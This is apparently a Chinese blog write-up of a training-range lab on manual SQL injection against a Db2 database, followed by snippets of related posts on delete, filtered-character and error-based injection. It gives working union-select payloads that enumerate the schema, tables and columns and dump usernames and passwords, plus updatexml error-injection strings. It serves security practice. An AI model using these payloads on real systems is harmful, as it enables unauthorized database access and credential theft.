墨者 SQL手工注入漏洞測試 Db2資料庫

2021-09-25 04:36:45 字數 1251 閱讀 5430

進入環境,用order by測試,發現可以,並測試到字段為4

接下來用union select 1,2,3,4 發現失敗

後來上網看了別人的思路是union select 1,2,3,4 from sysibm.systables就可以回顯了

應該是不同的資料庫語法問題

爆庫   id=2 union select 1,2,current schema,4 from sysibm.sysdummy1 ,注意db2是對大小寫敏感

sysibm.sysdummy1表是乙個記憶體的特殊表(按照oracle的術語,習慣稱之為「偽表」),常用於訪問db2中的暫存器,從而返回特定需要內容,類同於臨時表

可以用來返回當前實時資訊:

例如:'select current date from sysibm.sysdummy1' 命令返回當前系統日期

'select 1+1 from sysibm.sysdummy1' 執行數**算

'select nextval for myseq from sysibm.sysdummy1' 得到序列值

好了,繼續主題,爆表id=2 union select 1,2,tabname,4 from syscat.tables where tabschema=current schema limit 0,1

爆欄位, id=2 union select 1,2,column_name,4 from sysibm.columns where table_schema=current schema and table_name='game_character' limit 0,1

爆字段值 id=2 union select 1,name,password,4 from game_character limit 1,1

墨者 SQL注入漏洞測試 delete注入

測試注入 嘗試order by 失敗 測試and,頁面正常回顯 試著用報錯注入,and updatexml 1,concat 0x7e,select database 0x7e 1 發現有注入點,資料庫是pikaqiu 在這裡提醒大家不要用id 61 65進行注入,構造乙個不存在的最好 如博主用的是...

墨者靶場 初級 SQL過濾字元後手工注入漏洞測試

安全工程師 墨者 最近在練習sql手工注入漏洞,自己剛搭建好乙個靶場環境apache php mysql,php 對客戶端提交的引數做了些許過濾。來感受過濾過後的sql手工注入吧。1 掌握sql注入原理 2 了解手工注入的方法 3 了解字串的url加解密 4 了解sql注入常用注釋字元 5 了解sq...

墨者 SQL注入漏洞測試 報錯盲注

根據題意,用updatexml構造報錯回顯 and updatexml 1,concat 0x7e,select user 0x7e 1 爆庫 and updatexml 1,concat 0x7e,select database 0x7e 1 爆表 and updatexml 1,concat 0...